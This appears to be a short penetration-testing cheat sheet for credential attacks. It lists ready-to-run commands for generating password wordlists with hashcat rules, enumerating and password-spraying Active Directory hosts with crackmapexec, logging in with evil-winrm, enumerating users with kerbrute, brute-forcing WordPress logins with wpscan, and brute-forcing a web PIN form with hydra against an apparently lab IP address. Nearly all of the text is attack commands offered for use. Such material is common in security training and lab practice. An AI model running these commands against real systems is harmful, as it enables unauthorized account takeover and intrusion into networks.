Brute Force
Generate Wordlist
Password possibilites:
username
summer, spring, winter
password
date(jully, april, 2023, etc)
Using Hashcat
hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.lst
Active Directory
Check workstations
crackmapexec smb 192.168.1.0/24
crackmapexec winrm 192.168.1.0/24
# have a user and password?
# go enumerate computers in the domain
crackmapexec smb $IP -u <username> -p <password> --computers
Password spraying
check the password policy
crackmapexec smb $IP --pass-pol
# check this, if there is info like this go ahead for bruteforce.
Account Lockout Threshold: None
prepare for targets.txt, users.txt and passwords.txt
crackmapexec winrm targets.txt -u users.txt -p passwords.txt --continue-on-success -d <domain>
crackmapexec smb $IP -u users.txt -p '<password>'
crackmapexec winrm $IP -u users.txt -p '<password>'
# --> use evil-winrm to login
# example: evil-winrm -u mhope -p 'testpassword' -i $IP
Kerbrute
kerbrute userenum --dc <dc ip> -d <domain> users.txt
kerbrute userenum --dc <dc ip> -d <domain> /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
# kerbrute with NTLM hash (https://github.com/3gstudent/pyKerbrute)
Wordpress Login
wpscan --url <wordpress url> --wordlist /usr/share/wordlists/rockyou.txt --username <username>
Website Login Brute Force
hydra -l '' -P 3digits.txt -f -v 10.10.171.8 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000

Last updated